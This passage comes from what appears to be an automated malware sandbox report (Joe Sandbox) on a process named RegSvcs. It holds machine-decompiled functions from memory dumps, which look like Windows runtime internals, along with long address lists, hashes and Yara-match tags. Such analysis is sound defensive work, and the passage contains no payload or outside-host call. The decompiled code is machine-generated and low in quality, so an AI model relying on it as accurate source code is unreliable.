                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					_push(0x20);
                                          					_push(0x13cff00);
                                          					E0134D08C(_t283, _t320, _t328);
                                          					_v44 =  *[fs:0x18];
                                          					_t321 = 0;
                                          					 *_a24 = 0;
                                          					_t284 = _a12;
                                          					__eflags = _t284;
                                          					if(_t284 == 0) {
                                          						_t247 = 0xc0000100;
                                          					} else {
                                          						_v8 = 0;
                                          						_t329 = 0xc0000100;
                                          						_v52 = 0xc0000100;
                                          						_t249 = 4;
                                          						while(1) {
                                          							_v40 = _t249;
                                          							__eflags = _t249;
                                          							if(_t249 == 0) {
                                          								break;
                                          							}
                                          							_t297 = _t249 * 0xc;
                                          							_v48 = _t297;
                                          							__eflags = _t284 -  *((intOrPtr*)(_t297 + 0x12d1664));
                                          							if(__eflags <= 0) {
                                          								if(__eflags == 0) {
                                          									_t264 = E0133E5C0(_a8,  *((intOrPtr*)(_t297 + 0x12d1668)), _t284);
                                          									_t337 = _t337 + 0xc;
                                          									__eflags = _t264;
                                          									if(__eflags == 0) {
                                          										_t329 = E013751BE(_t284,  *((intOrPtr*)(_v48 + 0x12d166c)), _a16, _t321, _t329, __eflags, _a20, _a24);
                                          										_v52 = _t329;
                                          										break;
                                          									} else {
                                          										_t249 = _v40;
                                          										goto L62;
                                          									}
                                          									goto L70;
                                          								} else {
                                          									L62:
                                          									_t249 = _t249 - 1;
                                          									continue;
                                          								}
                                          							}
                                          							break;
                                          						}
                                          						_v32 = _t329;
                                          						__eflags = _t329;
                                          						if(_t329 < 0) {
                                          							__eflags = _t329 - 0xc0000100;
                                          							if(_t329 == 0xc0000100) {
                                          								_t293 = _a4;
                                          								__eflags = _t293;
                                          								if(_t293 != 0) {
                                          									_v36 = _t293;
                                          									__eflags =  *_t293 - _t321;
                                          									if( *_t293 == _t321) {
                                          										_t329 = 0xc0000100;
                                          										goto L76;
                                          									} else {
                                          										_t309 =  *((intOrPtr*)(_v44 + 0x30));
                                          										_t251 =  *((intOrPtr*)(_t309 + 0x10));
                                          										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t293;
                                          										if( *((intOrPtr*)(_t251 + 0x48)) == _t293) {
                                          											__eflags =  *(_t309 + 0x1c);
                                          											if( *(_t309 + 0x1c) == 0) {
                                          												L106:
                                          												_t329 = E01322AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
                                          												_v32 = _t329;
                                          												__eflags = _t329 - 0xc0000100;
                                          												if(_t329 != 0xc0000100) {
                                          													goto L69;
                                          												} else {
                                          													_t321 = 1;
                                          													_t293 = _v36;
                                          													goto L75;
                                          												}
                                          											} else {
                                          												_t254 = E01306600( *(_t309 + 0x1c));
                                          												__eflags = _t254;
                                          												if(_t254 != 0) {
                                          													goto L106;
                                          												} else {
                                          													_t293 = _a4;
                                          													goto L75;
                                          												}
                                          											}
                                          										} else {
                                          											L75:
                                          											_t329 = E01322C50(_t293, _a8, _t284, _a16, _a20, _a24, _t321);
                                          											L76:
                                          											_v32 = _t329;
                                          											goto L69;
                                          										}
                                          									}
                                          									goto L108;
                                          								} else {
                                          									E0130EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          									_v8 = 1;
                                          									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                          									_t329 = _a24;
                                          									_t261 = E01322AE4( &_v36, _a8, _t284, _a16, _a20, _t329);
                                          									_v32 = _t261;
                                          									__eflags = _t261 - 0xc0000100;
                                          									if(_t261 == 0xc0000100) {
                                          										_v32 = E01322C50(_v36, _a8, _t284, _a16, _a20, _t329, 1);
                                          									}
                                          									_v8 = _t321;
                                          									E01322ACB();
                                          								}
                                          							}
                                          						}
                                          						L69:
                                          						_v8 = 0xfffffffe;
                                          						_t247 = _t329;
                                          					}
                                          					L70:
                                          					return E0134D0D1(_t247);
                                          				}
                                          				L108:
                                          			}

                                          0x0132273c
                                          0x01322742
                                          0x01322747
                                          0x0132274a
                                          0x0132274d
                                          0x01322750
                                          0x00000000
                                          0x01322756
                                          0x01322756
                                          0x00000000
                                          0x01322902
                                          0x01322908
                                          0x0132290b
                                          0x00000000
                                          0x01322911
                                          0x0132291c
                                          0x01322921
                                          0x00000000
                                          0x01322921
                                          0x00000000
                                          0x00000000
                                          0x01322880
                                          0x01322887
                                          0x0132288c
                                          0x00000000
                                          0x00000000
                                          0x01322805
                                          0x0132280a
                                          0x01322814
                                          0x01322816
                                          0x00000000
                                          0x00000000
                                          0x0132281e
                                          0x01322821
                                          0x01322823
                                          0x00000000
                                          0x01322829
                                          0x01322829
                                          0x01322831
                                          0x0132283c
                                          0x0132283e
                                          0x00000000
                                          0x0132283e
                                          0x00000000
                                          0x00000000
                                          0x0132284e
                                          0x01322850
                                          0x01322851
                                          0x01322854
                                          0x01322857
                                          0x0132285a
                                          0x0132285c
                                          0x0132285d
                                          0x00000000
                                          0x00000000
                                          0x0132275d
                                          0x01322761
                                          0x00000000
                                          0x01322767
                                          0x0132276e
                                          0x01322773
                                          0x01322773
                                          0x01322776
                                          0x01322778
                                          0x0132277e
                                          0x0132277e
                                          0x01322781
                                          0x01322781
                                          0x01322783
                                          0x01322784
                                          0x00000000
                                          0x00000000
                                          0x01365bd8
                                          0x01365bde
                                          0x01365be4
                                          0x01365be6
                                          0x01365be8
                                          0x01365be9
                                          0x01365bee
                                          0x01365bf8
                                          0x01365bff
                                          0x01365c01
                                          0x01365c04
                                          0x01365c07
                                          0x01365c0b
                                          0x01365c0d
                                          0x01365c0d
                                          0x01365c15
                                          0x01365c18
                                          0x01365c1b
                                          0x01365c1b
                                          0x01365c1e
                                          0x00000000
                                          0x00000000
                                          0x013228c3
                                          0x013228c8
                                          0x013228d2
                                          0x013228d4
                                          0x013228d8
                                          0x013228db
                                          0x01365c26
                                          0x01365c28
                                          0x01365c2d
                                          0x01365c2d
                                          0x00000000
                                          0x00000000
                                          0x01365c34
                                          0x01365c36
                                          0x01365c49
                                          0x01365c4e
                                          0x01365c54
                                          0x01365c5b
                                          0x01365c5d
                                          0x01365c60
                                          0x01322788
                                          0x01322788
                                          0x0132278b
                                          0x0132278e
                                          0x0132278e
                                          0x0132278e
                                          0x01322791
                                          0x00000000
                                          0x00000000
                                          0x01322756
                                          0x01322750
                                          0x00000000
                                          0x01322794
                                          0x01322794
                                          0x01322795
                                          0x01322798
                                          0x01322798
                                          0x00000000
                                          0x01322734
                                          0x0132272c
                                          0x01322700
                                          0x013225ef
                                          0x013225ef
                                          0x013225ef
                                          0x013225f2
                                          0x013225f8
                                          0x00000000
                                          0x00000000
                                          0x013225fe
                                          0x00000000
                                          0x013228e6
                                          0x013228ec
                                          0x013228ef
                                          0x013228f5
                                          0x013228f8
                                          0x013228f8
                                          0x00000000
                                          0x013228f8
                                          0x00000000
                                          0x00000000
                                          0x01322866
                                          0x01322866
                                          0x01322876
                                          0x01322879
                                          0x00000000
                                          0x00000000
                                          0x013227e0
                                          0x013227e7
                                          0x013227e9
                                          0x013227eb
                                          0x01365afd
                                          0x00000000
                                          0x01365afd
                                          0x00000000
                                          0x00000000
                                          0x01322633
                                          0x01322638
                                          0x0132263b
                                          0x0132263c
                                          0x0132263e
                                          0x01322640
                                          0x01322642
                                          0x01322647
                                          0x01322649
                                          0x0132264e
                                          0x01322650
                                          0x01322653
                                          0x01322659
                                          0x013226a2
                                          0x013226a7
                                          0x013226ac
                                          0x013226b2
                                          0x01365b11
                                          0x01365b15
                                          0x01365b17
                                          0x00000000
                                          0x013226b8
                                          0x013226b8
                                          0x013226ba
                                          0x013227a6
                                          0x013227a6
                                          0x013227a9
                                          0x013227ab
                                          0x013227b9
                                          0x013227b9
                                          0x013227be
                                          0x013227c1
                                          0x013227c3
                                          0x013227c5
                                          0x013227c7
                                          0x01365c74
                                          0x01365c79
                                          0x01365c79
                                          0x013227c7
                                          0x00000000
                                          0x013226c0
                                          0x013226c0
                                          0x013226c3
                                          0x013226c6
                                          0x013226c6
                                          0x013226c9
                                          0x013226c9
                                          0x00000000
                                          0x013226c9
                                          0x013226ba
                                          0x0132265b
                                          0x0132265b
                                          0x0132265e
                                          0x01322667
                                          0x0132266d
                                          0x01322677
                                          0x0132267c
                                          0x0132267f
                                          0x01322681
                                          0x01365b49
                                          0x01365b4e
                                          0x013227cd
                                          0x013227d0
                                          0x013227d1
                                          0x013227d2
                                          0x013227d4
                                          0x013227dd
                                          0x01322687
                                          0x01322687
                                          0x0132268a
                                          0x0132268b
                                          0x0132268e
                                          0x0132268f
                                          0x01322691
                                          0x01322696
                                          0x01322698
                                          0x0132269d
                                          0x0132269f
                                          0x00000000
                                          0x0132269f
                                          0x01322681
                                          0x00000000
                                          0x00000000
                                          0x01322846
                                          0x00000000
                                          0x00000000
                                          0x01322605
                                          0x0132260a
                                          0x0132260c
                                          0x01322611
                                          0x01322616
                                          0x01322619
                                          0x01322619
                                          0x0132261e
                                          0x00000000
                                          0x01322624
                                          0x01322627
                                          0x01322627
                                          0x00000000
                                          0x00000000
                                          0x01365b1f
                                          0x00000000
                                          0x00000000
                                          0x01322894
                                          0x0132289b
                                          0x0132289d
                                          0x013228a1
                                          0x01365b2b
                                          0x01365b2e
                                          0x01365b2e
                                          0x013228a7
                                          0x013228a9
                                          0x01365b04
                                          0x01365b09
                                          0x01365b09
                                          0x01365b09
                                          0x00000000
                                          0x00000000
                                          0x01365b35
                                          0x01365b3c
                                          0x013228fb
                                          0x013228fb
                                          0x013226cc
                                          0x013226cc
                                          0x013226d0
                                          0x00000000
                                          0x013226d2
                                          0x013226d2
                                          0x00000000
                                          0x013226d2
                                          0x00000000
                                          0x00000000
                                          0x013225fe
                                          0x0132292d
                                          0x0132292f
                                          0x01322930
                                          0x01322935
                                          0x01322939
                                          0x0132293e
                                          0x01322941
                                          0x01322945
                                          0x01322946
                                          0x01322948
                                          0x0132294e
                                          0x0132294f
                                          0x01322957
                                          0x0132295a
                                          0x0132295c
                                          0x01322962
                                          0x01322965
                                          0x01322966
                                          0x01322968
                                          0x0132296e
                                          0x01322971
                                          0x01322974
                                          0x0132297b
                                          0x0132297e
                                          0x0132297f
                                          0x01322980
                                          0x01322981
                                          0x01322982
                                          0x01322983
                                          0x01322984
                                          0x01322985
                                          0x01322986
                                          0x01322987
                                          0x01322988
                                          0x01322989
                                          0x0132298a
                                          0x0132298b
                                          0x0132298c
                                          0x0132298d
                                          0x0132298e
                                          0x0132298f
                                          0x01322990
                                          0x01322992
                                          0x01322997
                                          0x013229a3
                                          0x013229a6
                                          0x013229ab
                                          0x013229ad
                                          0x013229b0
                                          0x013229b2
                                          0x01365c80
                                          0x013229b8
                                          0x013229b8
                                          0x013229bb
                                          0x013229c0
                                          0x013229c5
                                          0x013229c6
                                          0x013229c6
                                          0x013229c9
                                          0x013229cb
                                          0x00000000
                                          0x00000000
                                          0x013229cd
                                          0x013229d0
                                          0x013229d9
                                          0x013229db
                                          0x013229dd
                                          0x01322a7f
                                          0x01322a84
                                          0x01322a87
                                          0x01322a89
                                          0x01365ca1
                                          0x01365ca3
                                          0x00000000
                                          0x01322a8f
                                          0x01322a8f
                                          0x00000000
                                          0x01322a8f
                                          0x00000000
                                          0x013229e3
                                          0x013229e3
                                          0x013229e3
                                          0x00000000
                                          0x013229e3
                                          0x013229dd
                                          0x00000000
                                          0x013229db
                                          0x013229e6
                                          0x013229e9
                                          0x013229eb
                                          0x013229ed
                                          0x013229f3
                                          0x013229f5
                                          0x013229f8
                                          0x013229fa
                                          0x01322a97
                                          0x01322a9a
                                          0x01322a9d
                                          0x01322add
                                          0x00000000
                                          0x01322a9f
                                          0x01322aa2
                                          0x01322aa5
                                          0x01322aa8
                                          0x01322aab
                                          0x01365cab
                                          0x01365caf
                                          0x01365cc5
                                          0x01365cda
                                          0x01365cdc
                                          0x01365cdf
                                          0x01365ce5
                                          0x00000000
                                          0x01365ceb
                                          0x01365ced
                                          0x01365cee
                                          0x00000000
                                          0x01365cee
                                          0x01365cb1
                                          0x01365cb4
                                          0x01365cb9
                                          0x01365cbb
                                          0x00000000
                                          0x01365cbd
                                          0x01365cbd
                                          0x00000000
                                          0x01365cbd
                                          0x01365cbb
                                          0x01322ab1
                                          0x01322ab1
                                          0x01322ac4
                                          0x01322ac6
                                          0x01322ac6
                                          0x00000000
                                          0x01322ac6
                                          0x01322aab
                                          0x00000000
                                          0x01322a00
                                          0x01322a09
                                          0x01322a0e
                                          0x01322a21
                                          0x01322a24
                                          0x01322a35
                                          0x01322a3a
                                          0x01322a3d
                                          0x01322a42
                                          0x01322a59
                                          0x01322a59
                                          0x01322a5c
                                          0x01322a5f
                                          0x01322a5f
                                          0x013229fa
                                          0x013229f3
                                          0x01322a64
                                          0x01322a64
                                          0x01322a6b
                                          0x01322a6b
                                          0x01322a6d
                                          0x01322a72
                                          0x01322a72
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: f33c9f852b857f7754f14fbba4ed19332b1f2e2e277ac14dae39ca717b9d4d0c
                                          • Instruction ID: f147f48b2f0da591527c7274166cebf1a671aaf89538380e52b40a1deb0127ec
                                          • Opcode Fuzzy Hash: f33c9f852b857f7754f14fbba4ed19332b1f2e2e277ac14dae39ca717b9d4d0c
                                          • Instruction Fuzzy Hash: 9BC18171E00229DBDB25EF9DDC80BAEBBB9FF58758F444029E501BB250D7749941CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 42%
                                          			E012FC962(intOrPtr __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t19;
                                          				intOrPtr _t22;
                                          				void* _t26;
                                          				void* _t27;
                                          				void* _t32;
                                          				intOrPtr _t34;
                                          				void* _t35;
                                          				void* _t37;
                                          				intOrPtr* _t38;
                                          				signed int _t39;
                                          
                                          				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                          				_v8 =  *0x13ed360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                          				_t34 = __ecx;
                                          				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                          					_t26 = 0;
                                          					E0130EEF0(0x13e70a0);
                                          					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                          					if(E0137F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                          						L9:
                                          						E0130EB70(_t29, 0x13e70a0);
                                          						_t19 = _t26;
                                          						L2:
                                          						_pop(_t35);
                                          						_pop(_t37);
                                          						_pop(_t27);
                                          						return E0133B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                          					}
                                          					_t29 = _t34;
                                          					_t26 = E0137F1FC(_t34, _t32);
                                          					if(_t26 < 0) {
                                          						goto L9;
                                          					}
                                          					_t38 =  *0x13e70c0; // 0x0
                                          					while(_t38 != 0x13e70c0) {
                                          						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                          						_t38 =  *_t38;
                                          						_v12 = _t22;
                                          						if(_t22 != 0) {
                                          							_t29 = _t22;
                                          							 *0x13eb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                          							_v12();
                                          						}
                                          					}
                                          					goto L9;
                                          				}
                                          				_t19 = 0;
                                          				goto L2;
                                          			}



















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29feca407f3561aff3b3d75e76955be8432d9cde35976be14a5f3121431ab51a
                                          • Instruction ID: 4eb991a0c9475096565260ff60c81039e9fed9007a356363a55a07944fb06f11
                                          • Opcode Fuzzy Hash: 29feca407f3561aff3b3d75e76955be8432d9cde35976be14a5f3121431ab51a
                                          • Instruction Fuzzy Hash: D711E1313107069BCB21AF2CDC95A2BBBE9BF8461CF400538E94587699DB24ED54C7D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: N
                                          • API String ID: 0-1130791706
                                          • Opcode ID: 86d89c6ec9fc08658b6675074e315a47cad72f5037c494714ab4e3b3def23fcc
                                          • Instruction ID: 29b232ab0410c1842b08ff3d3344937bfcfb027084d5b74a6d18b6bea92652d5
                                          • Opcode Fuzzy Hash: 86d89c6ec9fc08658b6675074e315a47cad72f5037c494714ab4e3b3def23fcc
                                          • Instruction Fuzzy Hash: D55197315082919ED712CF78A8849DABFE0EE4337476806AFD8D1AF1A3C3399843C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E012F2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                          				signed char _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				signed int _v52;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t55;
                                          				signed int _t57;
                                          				signed int _t58;
                                          				char* _t62;
                                          				signed char* _t63;
                                          				signed char* _t64;
                                          				signed int _t67;
                                          				signed int _t72;
                                          				signed int _t77;
                                          				signed int _t78;
                                          				signed int _t88;
                                          				intOrPtr _t89;
                                          				signed char _t93;
                                          				signed int _t97;
                                          				signed int _t98;
                                          				signed int _t102;
                                          				signed int _t103;
                                          				intOrPtr _t104;
                                          				signed int _t105;
                                          				signed int _t106;
                                          				signed char _t109;
                                          				signed int _t111;
                                          				void* _t116;
                                          
                                          				_t102 = __edi;
                                          				_t97 = __edx;
                                          				_v12 = _v12 & 0x00000000;
                                          				_t55 =  *[fs:0x18];
                                          				_t109 = __ecx;
                                          				_v8 = __edx;
                                          				_t86 = 0;
                                          				_v32 = _t55;
                                          				_v24 = 0;
                                          				_push(__edi);
                                          				if(__ecx == 0x13e5350) {
                                          					_t86 = 1;
                                          					_v24 = 1;
                                          					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                          				}
                                          				_t103 = _t102 | 0xffffffff;
                                          				if( *0x13e7bc8 != 0) {
                                          					_push(0xc000004b);
                                          					_push(_t103);
                                          					E013397C0();
                                          				}
                                          				if( *0x13e79c4 != 0) {
                                          					_t57 = 0;
                                          				} else {
                                          					_t57 = 0x13e79c8;
                                          				}
                                          				_v16 = _t57;
                                          				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                          					_t93 = _t109;
                                          					L23();
                                          				}
                                          				_t58 =  *_t109;
                                          				if(_t58 == _t103) {
                                          					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                          					_t58 = _t103;
                                          					if(__eflags == 0) {
                                          						_t93 = _t109;
                                          						E01321624(_t86, __eflags);
                                          						_t58 =  *_t109;
                                          					}
                                          				}
                                          				_v20 = _v20 & 0x00000000;
                                          				if(_t58 != _t103) {
                                          					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                          				}
                                          				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                          				_t88 = _v16;
                                          				_v28 = _t104;
                                          				L9:
                                          				while(1) {
                                          					if(E01317D50() != 0) {
                                          						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                          					} else {
                                          						_t62 = 0x7ffe0382;
                                          					}
                                          					if( *_t62 != 0) {
                                          						_t63 =  *[fs:0x30];
                                          						__eflags = _t63[0x240] & 0x00000002;
                                          						if((_t63[0x240] & 0x00000002) != 0) {
                                          							_t93 = _t109;
                                          							E0138FE87(_t93);
                                          						}
                                          					}
                                          					if(_t104 != 0xffffffff) {
                                          						_push(_t88);
                                          						_push(0);
                                          						_push(_t104);
                                          						_t64 = E01339520();
                                          						goto L15;
                                          					} else {
                                          						while(1) {
                                          							_t97 =  &_v8;
                                          							_t64 = E0132E18B(_t109 + 4, _t97, 4, _t88, 0);
                                          							if(_t64 == 0x102) {
                                          								break;
                                          							}
                                          							_t93 =  *(_t109 + 4);
                                          							_v8 = _t93;
                                          							if((_t93 & 0x00000002) != 0) {
                                          								continue;
                                          							}
                                          							L15:
                                          							if(_t64 == 0x102) {
                                          								break;
                                          							}
                                          							_t89 = _v24;
                                          							if(_t64 < 0) {
                                          								E0134DF30(_t93, _t97, _t64);
                                          								_push(_t93);
                                          								_t98 = _t97 | 0xffffffff;
                                          								__eflags =  *0x13e6901;
                                          								_push(_t109);
                                          								_v52 = _t98;
                                          								if( *0x13e6901 != 0) {
                                          									_push(0);
                                          									_push(1);
                                          									_push(0);
                                          									_push(0x100003);
                                          									_push( &_v12);
                                          									_t72 = E01339980();
                                          									__eflags = _t72;
                                          									if(_t72 < 0) {
                                          										_v12 = _t98 | 0xffffffff;
                                          									}
                                          								}
                                          								asm("lock cmpxchg [ecx], edx");
                                          								_t111 = 0;
                                          								__eflags = 0;
                                          								if(0 != 0) {
                                          									__eflags = _v12 - 0xffffffff;
                                          									if(_v12 != 0xffffffff) {
                                          										_push(_v12);
                                          										E013395D0();
                                          									}
                                          								} else {
                                          									_t111 = _v12;
                                          								}
                                          								return _t111;
                                          							} else {
                                          								if(_t89 != 0) {
                                          									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                          									_t77 = E01317D50();
                                          									__eflags = _t77;
                                          									if(_t77 == 0) {
                                          										_t64 = 0x7ffe0384;
                                          									} else {
                                          										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                          									}
                                          									__eflags =  *_t64;
                                          									if( *_t64 != 0) {
                                          										_t64 =  *[fs:0x30];
                                          										__eflags = _t64[0x240] & 0x00000004;
                                          										if((_t64[0x240] & 0x00000004) != 0) {
                                          											_t78 = E01317D50();
                                          											__eflags = _t78;
                                          											if(_t78 == 0) {
                                          												_t64 = 0x7ffe0385;
                                          											} else {
                                          												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                          											}
                                          											__eflags =  *_t64 & 0x00000020;
                                          											if(( *_t64 & 0x00000020) != 0) {
                                          												_t64 = E01377016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                          											}
                                          										}
                                          									}
                                          								}
                                          								return _t64;
                                          							}
                                          						}
                                          						_t97 = _t88;
                                          						_t93 = _t109;
                                          						E0138FDDA(_t97, _v12);
                                          						_t105 =  *_t109;
                                          						_t67 = _v12 + 1;
                                          						_v12 = _t67;
                                          						__eflags = _t105 - 0xffffffff;
                                          						if(_t105 == 0xffffffff) {
                                          							_t106 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t106 =  *(_t105 + 0x14);
                                          						}
                                          						__eflags = _t67 - 2;
                                          						if(_t67 > 2) {
                                          							__eflags = _t109 - 0x13e5350;
                                          							if(_t109 != 0x13e5350) {
                                          								__eflags = _t106 - _v20;
                                          								if(__eflags == 0) {
                                          									_t93 = _t109;
                                          									E0138FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                          								}
                                          							}
                                          						}
                                          						_push("RTL: Re-Waiting\n");
                                          						_push(0);
                                          						_push(0x65);
                                          						_v20 = _t106;
                                          						E01385720();
                                          						_t104 = _v28;
                                          						_t116 = _t116 + 0xc;
                                          						continue;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting
                                          • API String ID: 0-316354757
                                          • Opcode ID: 3f00a9422555508b09daf7c84e94c1263814cfd416aee1fdaf70038758745ecf
                                          • Instruction ID: 7b220ae86faaecf01386621db4a658a79b0d3fc212e7864697c643c90af5badd
                                          • Opcode Fuzzy Hash: 3f00a9422555508b09daf7c84e94c1263814cfd416aee1fdaf70038758745ecf
                                          • Instruction Fuzzy Hash: ED612431A10645DFEB32DF6CC844B7EBBE9EB46718F280269EA11972C1C774F9018B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E013C0EA5(void* __ecx, void* __edx) {
                                          				signed int _v20;
                                          				char _v24;
                                          				intOrPtr _v28;
                                          				unsigned int _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				char _v44;
                                          				intOrPtr _v64;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed int _t58;
                                          				unsigned int _t60;
                                          				intOrPtr _t62;
                                          				char* _t67;
                                          				char* _t69;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t93;
                                          				intOrPtr _t115;
                                          				char _t117;
                                          				void* _t120;
                                          
                                          				_t83 = __edx;
                                          				_t117 = 0;
                                          				_t120 = __ecx;
                                          				_v44 = 0;
                                          				if(E013BFF69(__ecx,  &_v44,  &_v32) < 0) {
                                          					L24:
                                          					_t109 = _v44;
                                          					if(_v44 != 0) {
                                          						E013C1074(_t83, _t120, _t109, _t117, _t117);
                                          					}
                                          					L26:
                                          					return _t117;
                                          				}
                                          				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                          				_t5 = _t83 + 1; // 0x1
                                          				_v36 = _t5 << 0xc;
                                          				_v40 = _t93;
                                          				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                          				asm("sbb ebx, ebx");
                                          				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                          				if(_t58 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t93);
                                          					_push(0xffffffff);
                                          					_t80 = E01339730();
                                          					_t115 = _v64;
                                          					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                          						_push(_t93);
                                          						E013BA80D(_t115, 1, _v20, _t117);
                                          						_t83 = 4;
                                          					}
                                          				}
                                          				if(E013BA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                          					goto L24;
                                          				}
                                          				_t60 = _v32;
                                          				_t97 = (_t60 != 0x100000) + 1;
                                          				_t83 = (_v44 -  *0x13e8b04 >> 0x14) + (_v44 -  *0x13e8b04 >> 0x14);
                                          				_v28 = (_t60 != 0x100000) + 1;
                                          				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                          				_v40 = _t62;
                                          				if(_t83 >= _t62) {
                                          					L10:
                                          					asm("lock xadd [eax], ecx");
                                          					asm("lock xadd [eax], ecx");
                                          					if(E01317D50() == 0) {
                                          						_t67 = 0x7ffe0380;
                                          					} else {
                                          						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          						E013B138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                          					}
                                          					if(E01317D50() == 0) {
                                          						_t69 = 0x7ffe0388;
                                          					} else {
                                          						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          					}
                                          					if( *_t69 != 0) {
                                          						E013AFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                          					}
                                          					if(( *0x13e8724 & 0x00000008) != 0) {
                                          						E013B52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                          					}
                                          					_t117 = _v44;
                                          					goto L26;
                                          				}
                                          				while(E013C15B5(0x13e8ae4, _t83, _t97, _t97) >= 0) {
                                          					_t97 = _v28;
                                          					_t83 = _t83 + 2;
                                          					if(_t83 < _v40) {
                                          						continue;
                                          					}
                                          					goto L10;
                                          				}
                                          				goto L24;
                                          			}

























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
